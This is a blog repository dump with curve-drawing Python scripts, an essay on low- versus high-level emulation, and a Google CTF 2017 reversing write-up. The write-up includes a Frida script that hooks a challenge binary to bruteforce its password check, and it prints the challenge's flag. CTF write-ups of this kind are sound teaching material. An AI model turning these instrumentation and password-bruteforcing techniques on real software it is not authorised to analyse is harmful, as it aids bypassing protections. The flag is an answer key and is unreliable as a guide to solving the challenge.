32 |     e = width >> 1
33 |     # Calculate canvas size
34 |     sz = mg * ((1 <<  n) - 1) + width
35 |     pos = (e, e)
36 |     img = Image.new(mode, (sz, sz), get_colors('white', mode)[0])
37 |     draw = ImageDraw.Draw(img)
38 |     colors = get_colors(colors, mode)
39 |     for i in range(1, 1 << (n << 1)):
40 |         dx, dy = hilbert_direction(i)
41 |         npos = (pos[0] + mg * dx, pos[1] - mg * dy)
42 |         line = [ pos, npos ]
43 |         draw.line(line, fill=colors[(i - 1) % len(colors)], width=width)
44 |         pos = npos
45 |     return img
46 | 
47 | img = draw_hilbert(5, mg=16, colors='blue,red',width=7)
48 | img.show()
49 | img.save('xorpd_0x3c_hilbert.png', optimize=True, dpi=(150, 150))
50 | 


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.png


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | from PIL import Image, ImageDraw, ImageColor
 3 | 
 4 | n = 5      # Generation number
 5 | mg = 32    # Image magnification (line segment size)
 6 | width = 3  # Line width
 7 | 
 8 | def morton(n):
 9 |     pos = [ 0, 0 ]
10 |     yield tuple(pos)
11 |     for i in range(1, 1 << (2 * n)):
12 |         k = 1
13 |         while True:
14 |             pos[0] ^= k
15 |             k &= ~pos[0]
16 |             if not k:
17 |                 break
18 |             pos[1] ^= k
19 |             k &= ~pos[1]
20 |             if not k:
21 |                 break
22 |             k <<= 1
23 |         yield tuple(pos)
24 | 
25 | def disinterleave(z):
26 |     x = 0
27 |     y = 0
28 |     k = 0
29 |     while z:
30 |         x |= (z & 1) << k
31 |         y |= (z & 2) << k
32 |         z >>= 2
33 |         k += 1
34 |     y >>= 1
35 |     return x, y
36 | 
37 | def interleave(x, y):
38 |     z = 0
39 |     y <<= 1
40 |     k = 0
41 |     while x or y:
42 |         z |= ((x & 1) | (y & 2)) << k
43 |         x >>= 1
44 |         y >>= 1
45 |         k += 2
46 |     return z
47 | 
48 | def morton2(n):
49 |     for i in range(1 << (2 * n)):
50 |         yield disinterleave(i)
51 | 
52 | def scale_point(pt, corner, mg):
53 |     return corner[0] + pt[0] * mg, corner[1] + pt[1] * mg
54 | 
55 | def draw_morton(n, mg, width, color='black'):
56 |     sz = width + mg * ((1 << n) - 1)
57 |     img = Image.new('RGB', (sz, sz), ImageColor.getcolor('white', 'RGB'))
58 |     draw = ImageDraw.Draw(img)
59 |     gen = morton(n)
60 |     corner = (width >> 1, width >> 1)
61 |     scaler = lambda x: scale_point(x, corner, mg)
62 |     pos = next(gen)
63 |     for npos in gen:
64 |         draw.line(list(map(scaler, [ pos, npos ])), fill=ImageColor.getcolor(color, img.mode), width=width)
65 |         pos = npos
66 |     return img
67 | 
68 | img = draw_morton(5, mg=16, color='black', width=1)
69 | img.show()
70 | img.save('xorpd_0x3d_morton.png', optimize=True, dpi=(150, 150))
71 | 


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3f_hanoi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3f_hanoi.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2017-06-19
  4 | title: GoogleCTF 2017 Reversing/Moon writeup
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | Last weekend I participated on the [Google CTF 2017](https://capturetheflag.withgoogle.com/) as part of the glorious team "*63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76*" composed of [AlexF0rtune](https://twitter.com/AlexF0rtune) and me. Among the many tough and fun challenges that we attempted, and the few ones that we actually solved, *moon* was certainly the most entertaining one for me, so I decided to prepare a writeup of my solution.
  9 | 
 10 | The problem simply states:
 11 | 
 12 | > What's the password?
 13 | > [moon.zip](moon.zip)
 14 | 
 15 | 
 16 | ## Static analysis
 17 | 
 18 | After extracting the ZIP file, we see our target is a Win32 executable, using OpenGL to render a simple UI asking for a password of length 32. For wrong passwords it will display the message: "*Nope*".
 19 | 
 20 | As usual with these kind of challenges, one would start by looking for occurrences of this string within the executable, and find code referencing said string. Opening the executable with [IDA Pro](https://www.hex-rays.com/products/ida/) and searching for strings containing `Nope` we find the string `____NopeGood` referenced in `sub_402660`. Decompiled and slightly formatting the relevant code results in:
 21 | 
 22 | ```cpp
 23 | // const char aNopegood[] = "    NopeGood";
 24 | v12 = dword_4CA0AC;
 25 | v15 = 4 * v12;
 26 | v16 = (unsigned __int8)aNopegood[v15];
 27 | ```
 28 | 
 29 | The value `dword_4CA0AC` acts as an index into the aforementioned string. If we want to succeed (i.e. obtain `Good`) we need its value to be 2. If we search of occurrences where the value at `4CA0AC` is modified to 2 we obtain the following occurrence in the function `sub_498A10`:
 30 | 
 31 | ![](ida.png)
 32 | 
 33 | In order to pass the test, both buffers passed to `memcmp` have to match.
 34 | 
 35 | 
 36 | ## Dynamic analysis
 37 | 
 38 | To simplify the process of reversing, we used [x64dbg](http://x64dbg.com/) to quickly debug and inspect the memory of the program while it's running.
 39 | 
 40 | These buffers seem to contain each 512 bytes of what looks like the hexadecimal representation of a hash. The contents pointed by `rcx` change every time the password is modified (*computed hash string*). The contents pointed by `rdx` are constant (*expected hash string*) and it's first bytes are:
 41 | 
 42 | ```
 43 |                    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
 44 | 0000000000F86BD0  33 30 63 37 65 61 64 39 37 31 30 37 37 37 35 39  30c7ead971077759         
 45 | 0000000000F86BE0  36 39 62 65 34 62 61 30 30 63 66 35 35 37 38 66  69be4ba00cf5578f         
 46 | ...
 47 | ```
 48 | 
 49 | After reversing `sub_498A10`, we realize that the *computed buffer* is generated by converting each integer from a buffer `uint32_t hash[64]` (i.e. length 0x100) into a hexadecimal string via `%.8x` (see `sub_4016D0`). Concatenating all these hexadecimal strings results in the aforementioned hexadecimal string. Relevant code:
 50 | 
 51 | ```cpp
 52 | v14 = (__int128 *)&v41;
 53 | // ...
 54 | if ((unsigned __int8)sub_401BF0(qword_4CA080, (unsigned __int64)&v41)) {
 55 |   do {
 56 |     v15 = *(_DWORD *)v14;
 57 |     v28 = 0i64;
 58 |     v29 = 0;
 59 |     sub_4016D0(&v28, "%.8x", v15);
 60 |     v16 = (char *)&v28 + strlen((const char *)&v28);
 61 |     if ( v16 - (char *)&v28 > 0x7FFFFFFFFFFFFFFFi64 - Size )
 62 |       sub_4921C0("basic_string::append");
 63 |     sub_486EE0(&Memory, &v28, v16 - (char *)&v28);
 64 |     v14 = (__int128 *)((char *)v14 + 4);
 65 |   }
 66 |   // ...
 67 | }
 68 | ```
 69 | 
 70 | This buffer pointed by `v41` contains the raw bytes of the hash. This hash is updated by the function `sub_401BF0(const char* password, char* hash)` every time the user-supplied password reaches 32 characters in length.
 71 | 
 72 | Brief pause:
 73 | > As you see, instead of reverse engineering entire functions and then making sense of the code, our approach could be described as doing inverse data-taining manually and reverse engineering only the necessary bits along the way.
 74 | 
 75 | Inside `sub_401BF0` we attempted to locate where the data copied to the hash pointer `v41` was coming from. It was being copied from another buffer at address `0000000007478000` (in that particular execution) which looked "quite suspicious" due to following reasons:
 76 | 
 77 | 1. Hardware breakpoints on memory accesses were not working.
 78 | 2. This buffer was filled right after calling functions from my GPU driver libraries (in my case `ig9icd64.dll`), most likely just its OpenGL implementation.
 79 | 
 80 | ```
 81 |                    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
 82 | 0000000007478000  01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00  ................         
 83 | 0000000007478010  01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00  ................         
 84 | ...        
 85 | 0000000007478100  E3 5C A9 DE C6 42 8F 29 61 7C A1 5C 44 62 87 AB  ã\©ÞÆB.)a|¡\Db.«         
 86 | 0000000007478110  E7 1D B9 DA C2 03 9F 2D 65 3D B1 58 40 23 97 AF  ç.¹ÚÂ..-e=±X@#.¯         
 87 | ...
 88 | ```
 89 | 
 90 | We suspect GPGPU is coming into play and that compute shaders might be responsible for generating the hash.
 91 | 
 92 | 
 93 | ## Extracting compute shaders
 94 | 
 95 | Looking at the strings in the executable, it's clear that no compute shader is visible as plaintext. However, rather than inspecting which of the many functions is responsible of decrypting the GLSL source, or trying to locate it somewhere within the user address space. We fetch it from where the application could never hide it: the GPU driver libraries.
 96 | 
 97 | For that purpose we use [Apitrace](http://apitrace.github.io/). We spawn *moon.exe* with it, in *OpenGL* mode, fill out a dummy password, close the application and proceed to inspect the list of captured frames. From the long list of frames, most with 1027 calls, we notice one with 1041 calls. As expected, the small difference here is that the application maps shader storage buffer and fills it with `GL_COMPUTE_SHADER` data.
 98 | 
 99 | ![](apitrace.png)
100 | 
101 | Apitrace provides us the application-supplied source code for the mapped shader, which we auto-formatted for readability reasons. You can read the entire GLSL source code at: [moon.glsl](moon.glsl).
102 | 
103 | Next, we will discuss the most important parts of the shader. Firstly, we observed the following input/output buffers:
104 | 
105 | ```glsl
106 | layout(std430, binding = 0) buffer shaderExchangeProtocol {
107 |   uint state[64];
108 |   uint hash[64];
109 |   uint password[32];
110 | };
111 | ```
112 | 
113 | The meaning of `password` is clear from the context. Inspecting the GLSL code we notice that every invocation of the shader results in a `uint32_t` value being updated in `hash[idx]`. Similarly, the value `state[idx]` changes from 1 to 2 to mark that particular task as finished.
114 | 
115 | ```glsl
116 | if ((idx & 1) == 0) {
117 |   final = hash_alpha(password[idx / 2]);
118 | } else {
119 |   final = hash_beta(password[idx / 2]);
120 | }
121 | ```
122 | 
123 | For every character in `password`, two different hashes are computed, `hash_alpha` and `hash_beta`, each resulting in a `uint32_t` value that is stored in the `hash` buffer after XOR'ing it further. More details on these operations will be given in the following paragraphs.
124 | 
125 | Our goal now is to recover the password from the expected hash. Here we noticed two possible approaches, a quick one (which we used in the CTF), and a more elegant one (for the sake of perfectionism and pleasing mathematicians).
126 | 
127 | 
128 | ## Strategy #1: The Hacker's Approach
129 | 
130 | Every invocation of the compute shader takes into account a **single character** of the password in order to generate a `uint32_t` value of the hash, except for the final part that interates over the whole password:
131 | 
132 | ```glsl
133 | uint h = 0x5a;
134 | for (i = 0; i < 32; i++) {
135 |   uint p = password[i];
136 |   uint r = (i * 3) & 7;
137 |   p = (p << r) | (p >> (8 - r));
138 |   p &= 0xff;
139 |   h ^= p;
140 | }
141 | final ^= (h | (h << 8) | (h << 16) | (h << 24));
142 | ```
143 | 
144 | However, since `p` is always masked with 0xFF, `h` will be in range [0x00, 0xFF]. Thus, there are only 256 possible values with which the `final` variable could be XOR'ed (e.g. `01010101`, `02020202`, etc.). This can be bruteforced by iterating over every possible value of `h`.
145 | 
146 | * __Bruteforcing algorithm__: For every position `i` in the password, we try character `c` and temporarily set `password[i] = c`. We calculate the first of the two resulting `uint32_t` hash values (we don't need the second one!) and, as described before, we XOR the result with every of the 256 possible values with which `final` could be XOR'ed. If there's a match, we keep the character `c` and move on with the next `i`.
147 | 
148 | Considering a 32-byte password and 256 choices for each `c` and `h`, we get the following worst case scenario: 32 * 256 * 256 = 2097152 attempts.
149 | 
150 | We could reimplement the whole algorithm again, which would certainly save computing time. But on a CTF, it's *our* time the one that matters. To solve the challenge as quick as possible time we used [Frida](https://www.frida.re/) to instrument *moon.exe*, and automatically execute the function `sub_401BF0` for arbitrary passwords. You can find the source code at [bruteforcer.py](bruteforcer.py).
151 | 
152 | 
153 | To explain the code briefly: We allocate the buffers that will hold both the password and hash. We will pass them as arguments to the *hashgen* function (aka. `sub_401BF0`), which is transformed into a `NativeFunction` to be invocated later on directly from our code.
154 | 
155 | ```javascript
156 | // Buffers 
157 | var pswd_ptr = Memory.alloc(0x20);
158 | var hash_ptr = Memory.alloc(0x400);
159 | 
160 | var hashgen_ptr = new NativePointer(0x401BF0);
161 | var hashgen = new NativeFunction(keygen_ptr, 'int', ['pointer', 'pointer']);
162 | ```
163 | 
164 | Then, for every choice of `i`, `c`, `h`, we have the following block of code (i.e. deep within three nested loops).
165 | 
166 | ```javascript
167 | var maskh = to_uint32(h | (h << 8) | (h << 16) | (h << 24));
168 | Memory.writeU8(pswd_ptr.add(i), c);
169 | keygen(pswd_ptr, hash_ptr);
170 | var dword = Memory.readU32(hash_ptr.add(8*i)) ^ maskh;
171 | if (to_uint32(dword) == to_uint32(expected[2*i])) {
172 |   valid = true;
173 |   break;
174 | }
175 | ```
176 | 
177 | After around 1 minute of computing time we obtain the following output. Challenge solved!
178 | 
179 | ```
180 | CTF{OpenGLMoonMoonG0esT0TheMoon}
181 | ```
182 | 
183 | Small addendum:
184 | * Note that we didn't need to understand what `hash_alpha` and `hash_beta` were doing. We recovered the entire password just by cleverly bruteforcing over (half of!) the expected hash buffer entries.
185 | * We are aware that `h` does not need to be bruteforced again for `i > 0` and by restricting ourselves to printable choices of `c` we could bring the worst case scenario down to: 32 * (0x7E - 0x20 + 1) + 256 = 3264 attempts (x100 speedup). However, the naive approach was fast enough for us.
186 | 
187 | 
188 | ## Strategy #2: The Mathematician's Approach
189 | 
190 | We start by analyzing `hash_alpha` and `hash_beta`. They are identical, except that they access different indices from the vector `calc(p)`, corresponding to its components X and Y respectively. The function `calc` converts  character `p`, interpreted as degrees, to radians stored in the variable `r`. Then, it computes the following:
191 | 
192 | ![$$
193 |   \begin{pmatrix}
194 |     \cos{r} & -\sin{r} & 0 \\
195 |     \sin{r} & \cos{r} & 0 \\
196 |     0 & 0 & 1 \\
197 |   \end{pmatrix}
198 |   \cdot
199 |   \begin{pmatrix} 1024 \\ 0 \\ 0 \end{pmatrix} +
200 |   \begin{pmatrix} 2048 \\ 2048 \\ 0 \end{pmatrix} 
201 | $$](latex-1.png)
202 | 
203 | Thus we know that the intermediate values are in range [0, 2048] since:
204 | * *X*: `uint(calc(p)[0]) == 1024*cos(r) + 2048`.
205 | * *Y*: `uint(calc(p)[1]) == 1024*sin(r) + 2048`.
206 | 
207 | Given *X* and *Y* we could compute back `p` via:
208 | 
209 | ![$$
210 |   \text{degrees}(\text{atan2}(\frac{Y - 2048}{1024}, \frac{X - 2048}{1024}))
211 | $$](latex-2.png)
212 | 
213 | Next, we analyze the `extend` function:
214 | 
215 | ```glsl
216 | uint extend(uint e) {
217 |   uint i;
218 |   uint r = e ^ 0x5f208c26;
219 |   for (i = 15; i < 31; i += 3) {
220 |     uint f = e << i;
221 |     r ^= f;
222 |   }
223 |   return r;
224 | }
225 | ```
226 | 
227 | The argument `e` is XOR'ed with a constant and then again with multiple copies of itself shifted by some amount. *Luckily* for us those shifts are larger than 15, that the low 15 bits are left untouched, which is enough to keep or values *X*,*Y* undamaged as they are in range [0, 2048].
228 | 
229 | This concludes the `hash_alpha` and `hash_beta` functions. Next, we analyze the code modifying the `final` variable inside the `main` function. The first loop is actually a constant-ish XOR (only depends on the index, which is known), so we are able to revert this as well:
230 | 
231 | ```glsl
232 | uint i;
233 | for (i = 0; i < 32; i += 6) {
234 |   final ^= idx << i;
235 | }
236 | ```
237 | 
238 | For the final part, as mentioned in the previous section, we could try bruteforcing which of the 256 possible values of `h` is the correct one. However, note that undoing the previous constant XOR's should have yield the values for *X* and *Y* whose bits with index #15 to #11 should be zero (since 2048 = 2^11). This indirectly tells you those bits for `h` which slightly reduces the entropy.
239 | 
240 | Putting all together, for some `h`, the steps to recover the password character at index `i`, given corresponding hashes *A* and *B* are as follow:
241 | 1. Revert the XORs in `main` for *A* and *B*. 
242 | 2. Revert the XOR in `extend` for *A* and *B*.
243 | 3. Compute `X = (A ^ 0x5F208C26) & 0x7FFF` and `Y = (B ^ 0x5F208C26) & 0x7FFF`.
244 | 4. Compute `c = deg(atan2((Y-2048)/1024, (X-2048)/1024)`.
245 | 5. Set `password[i] = c`.
246 | 
247 | Once again, challenge solved!
248 | 
249 | There is no code available for this approach since it's not the strategy we followed in the CTF, but we found it quite an elegant approach worthy of discussion.
250 | 


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/_main.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/_main.pdf


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/apitrace.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/apitrace.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/bruteforcer.py:
--------------------------------------------------------------------------------
 1 | import frida
 2 | import time
 3 | 
 4 | code = """
 5 | 'use strict';
 6 | 
 7 | var pswd_ptr = Memory.alloc(0x20);
 8 | var hash_ptr = Memory.alloc(0x400);
 9 | 
10 | var keygen_ptr = new NativePointer(0x401BF0);
11 | var keygen = new NativeFunction(keygen_ptr, 'int', ['pointer', 'pointer']);
12 | 
13 | var expected = [
14 |     0x30c7ead9, 0x71077759,
15 |     0x69be4ba0, 0x0cf5578f,
16 |     0x1048ab13, 0x75113631,
17 |     0xdbb6871d, 0xbe35162b,
18 |     0x1c62e982, 0xeb6a7512,
19 |     0xf3274743, 0xfb2e55c8,
20 |     0x18912779, 0xef7a3416,
21 |     0x9a838666, 0xff3994bb,
22 |     0x4d3c6e14, 0xba2d732f,
23 |     0x14414f2c, 0x1cb5d384,
24 |     0x4935aebb, 0xbe3fb206,
25 |     0x343a004e, 0x18a092da,
26 |     0xba02e3c0, 0x96987154,
27 |     0x8ed2c372, 0xeb68d1af,
28 |     0x41152cb3, 0xb61f300e,
29 |     0x3c1a8246, 0x108010d2,
30 |     0x82e16df8, 0xae7bff6c,
31 |     0xb6314d4a, 0xd38b5f97,
32 |     0x79ef2320, 0x8efe3e1b,
33 |     0x69970042, 0x9eae1fa9,
34 |     0x3c036e5d, 0xcbe87d32,
35 |     0xbe1ecfac, 0x2452ddfd,
36 |     0xc704a00e, 0xa24fbc21,
37 |     0x61b7824a, 0x968e9da1,
38 |     0xdb756712, 0xbe3e7b3d,
39 |     0x3420c8f3, 0x3c37dba4,
40 |     0x2072a941, 0xd799ba2e,
41 |     0xebbf8619, 0x1cb59aa4,
42 |     0x9a80ebe0, 0xb61a7974,
43 |     0x1888cb62, 0x341259f6,
44 |     0x2848aad4, 0x4df2b809,
45 |     0x383e0943, 0x7928980f
46 | ];
47 | 
48 | function to_uint32(n) {
49 |     return (n + 0x100000000) & 0xFFFFFFFF;
50 | }
51 | 
52 | Interceptor.attach(keygen_ptr, {
53 |     onEnter: function (args) {
54 |         for (var i = 0; i < 0x20; i++) {
55 |             console.log("Index " + i + " of 32");
56 |             for (var c = 0; c < 0x100; c++) {
57 |                 var valid = false;
58 |                 for (var h = 0; h < 0x100; h++) {
59 |                     var maskh = to_uint32(h | (h << 8) | (h << 16) | (h << 24));
60 |                     Memory.writeU8(pswd_ptr.add(i), c);
61 |                     keygen(pswd_ptr, hash_ptr);
62 |                     var dword = Memory.readU32(hash_ptr.add(8*i)) ^ maskh;
63 |                     if (to_uint32(dword) == to_uint32(expected[2*i])) {
64 |                         valid = true;
65 |                         break;
66 |                     }
67 |                 }
68 |                 if (valid) break;
69 |             }
70 |         }
71 |         console.log(hexdump(pswd_ptr, {length: 32}));
72 |         console.log(Memory.readUtf8String(pswd_ptr, 32));
73 |     }
74 | });
75 | """
76 | 
77 | def on_message(message, data):
78 |     print(message)
79 |     
80 | pid = frida.spawn(['moon/moon.exe'])
81 | frida.resume(pid)
82 | 
83 | session = frida.attach(pid)
84 | script = session.create_script(code)
85 | script.on('message', on_message)
86 | script.load()
87 | 


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/ida.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/ida.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/latex-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/latex-1.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/latex-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/latex-2.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/moon.glsl:
--------------------------------------------------------------------------------
 1 | #version 430
 2 | layout(local_size_x = 8, local_size_y = 8) in ;
 3 | layout(std430, binding = 0) buffer shaderExchangeProtocol {
 4 |   uint state[64];
 5 |   uint hash[64];
 6 |   uint password[32];
 7 | };
 8 | vec3 calc(uint p) {
 9 |   float r = radians(p);
10 |   float c = cos(r);
11 |   float s = sin(r);
12 |   mat3 m = mat3(c, -s, 0.0, s, c, 0.0, 0.0, 0.0, 1.0);
13 |   vec3 pt = vec3(1024.0, 0.0, 0.0);
14 |   vec3 res = m * pt;
15 |   res += vec3(2048.0, 2048.0, 0.0);
16 |   return res;
17 | }
18 | uint extend(uint e) {
19 |   uint i;
20 |   uint r = e ^ 0x5f208c26;
21 |   for (i = 15; i < 31; i += 3) {
22 |     uint f = e << i;
23 |     r ^= f;
24 |   }
25 |   return r;
26 | }
27 | uint hash_alpha(uint p) {
28 |   vec3 res = calc(p);
29 |   return extend(uint(res[0]));
30 | }
31 | uint hash_beta(uint p) {
32 |   vec3 res = calc(p);
33 |   return extend(uint(res[1]));
34 | }
35 | void main() {
36 |   uint idx = gl_GlobalInvocationID.x + gl_GlobalInvocationID.y * 8;
37 |   uint final;
38 |   if (state[idx] != 1) {
39 |     return;
40 |   }
41 |   if ((idx & 1) == 0) {
42 |     final = hash_alpha(password[idx / 2]);
43 |   } else {
44 |     final = hash_beta(password[idx / 2]);
45 |   }
46 |   uint i;
47 |   for (i = 0; i < 32; i += 6) {
48 |     final ^= idx << i;
49 |   }
50 |   uint h = 0x5a;
51 |   for (i = 0; i < 32; i++) {
52 |     uint p = password[i];
53 |     uint r = (i * 3) & 7;
54 |     p = (p << r) | (p >> (8 - r));
55 |     p &= 0xff;
56 |     h ^= p;
57 |   }
58 |   final ^= (h | (h << 8) | (h << 16) | (h << 24));
59 |   hash[idx] = final;
60 |   state[idx] = 2;
61 |   memoryBarrierShared();
62 | }
63 | 


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/moon.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/moon.zip


--------------------------------------------------------------------------------
/posts/2018-04-18-lle-vs-hle/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: post
 3 | date: 2018-04-18
 4 | title: LLE vs HLE and their tradeoffs
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | ## Introduction
 9 | 
10 | This article aims to give an intuitive understanding for the terms "*Low-Level Emulation*" (LLE) and "*High-Level Emulation*" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other.
11 | 
12 | Machines are made of several *layers of abstraction*, each of them relying in the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level):
13 | 
14 | - Game
15 | - Game engine
16 | - System libraries
17 | - Kernel/drivers
18 | - Hardware
19 |  
20 | That's where these "*low-level*" or "*high-level*" terms come from. Something is more "*high-level*" when it has more layers of abstraction below it, and it's more "*low-level*" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below than hardware-level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there's also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why?
21 | 
22 | ## Emulation paradigms
23 | 
24 | Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system all about putting a "*barrier*" between two adjacent layers of abstraction. For instance:
25 |  
26 | - "*LLE emulators*" ([EPSXE](http://www.epsxe.com/), [PCSX2](https://pcsx2.net/)): They put the barrier between the hardware and the kernel. The entire software stack would run as usual thinking it's on a real PS1, PS2 etc., but whenever the hardware is accessed (e.g. PCI configuration registers, MMIO accesses, etc.) the emulator would intercept that and execute whatever the emudevs wanted. This is the reason why you get the original console menus and the overall "look and feel" of the console.
27 | - "*HLE emulators*" ([RPCS3](https://rpcs3.net/), [Citra](https://citra-emu.org/)): They put the barrier between the kernel and userland (i.e. applications, games, etc.). The application runs as usual (of course, after translating userland instructions), but whenever it needs to access the operating system (e.g. to open files, to map memory, to create threads), that request aka. syscall will be intercepted and handled by some code written by the emudevs. This is the reason why you can typically just drag-and-drop a game and start playing it without booting any underlying OS.
28 |  
29 | Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)?
30 |  
31 | When you place this "emulation" barrier between two layers, you have to **reimplement** the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can **execute** successfully. This results in two costs that you have to balance: "*development time*" and "*execution time*". Let me explain why this balance is important with few extreme examples of poor balances:
32 |  
33 | - *Too high-level*: What would happen if you'd put that barrier between the game engine and the actual game? This idea used to be not so crazy, as it's what https://www.scummvm.org/ does. However, game engines these days are insanely complex with several million lines of code, it would take you centuries as a single developer to write an emulator that operated at such high levels. The "*development time*" would be massive, but the "*execution time*" (i.e. the emulator's performance) would be pretty good, since all the complex tasks have been reimplemented natively for the host system.
34 |  
35 | - *Too low-level*: What would happen if you wrote a transistor-level emulator? Again, not so crazy for old platforms, see the http://www.visual6502.org/ project. Assuming you had the equipment to decap a chip, a scanning electron microscope and fancy computer vision algorithms, you could easily generate code that simulates your target microprocessor, so little "*development time*", however, the "*execution time*" would be insanely high caused by simulating billions of transistors.
36 |  
37 | As you see, the rule of thumb is: higher-level incurs in larger development costs, and lower-level incurs in larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the perfomance of different emulator paradigms.
38 | 
39 | ## Performance myths
40 | 
41 | Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balence "*development time*" vs "*execution time*" and pick the right strategy. How do you estimate those costs, specially "*execution time*", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targetting. The resulting performance will be depend on how many "*concepts*" from your *guest machine* (i.e. the thing you're trying to emulate), can be mapped into your *host machine* (the thing that will run the emulator).
42 |  
43 | To give you an example, one such "*concept*" is the MMU. To explain it briefly (and slightly wrong/oversimplified but for the sake of the explanation will do), the MMU is the thing that allows each application have access to a slice of RAM by mapping addresses of a "*virtual address space*" (an imaginary arrangement of memory) to a "*physical address space*" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one.
44 |  
45 | - HLE emulators typically don't worry about the guest MMU since guest applications only use virtual addressing and whenever they try to contact the guest kernel (e.g. to allocate more memory), the emulator takes control and very generously gives the guest application a chunk of its own host virtual memory. So everyone's happy.
46 |  
47 | - LLE emulators have to worry about both the guest virtual memory and the guest physical memory. Many of them allocate guest physical memory during initialization, and do the "*guest virtual memory* to *guest physical memory*" translation by emulating the MMU on software. That causes every memory access (1 instruction) to invoke some specialized code that does the translation+access (100's of instructions). Of course, some translations can be cached, but the performance hit is still high. Remember that for every guest access, you have to traverse 4 layers:
48 | 
49 |     1. Guest virtual memory
50 |     2. Guest physical memory
51 |     3. Host virtual memory
52 |     4. Host physical memory
53 |  
54 | However in some scenarios (this depends on MMU quirks, page sizes, etc.), you could have use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having an hypervisor letting it directly access a slice of the host computer's physical RAM directly. This would remove the need for expensive software-based address translation and result in large performance gains.
55 | 
56 | ## Conclusion
57 | 
58 | By making a better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with an acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 [[1]](http://michaelbrundage.com/project/xbox-360-emulator/) and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources.
59 |  
60 | Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring in 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "*performance penalty*" numbers, everything has to be considered in a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems really in detail.
61 | 


--------------------------------------------------------------------------------
/posts/2018-04-18-lle-vs-hle/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>LLE vs HLE and their tradeoffs</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
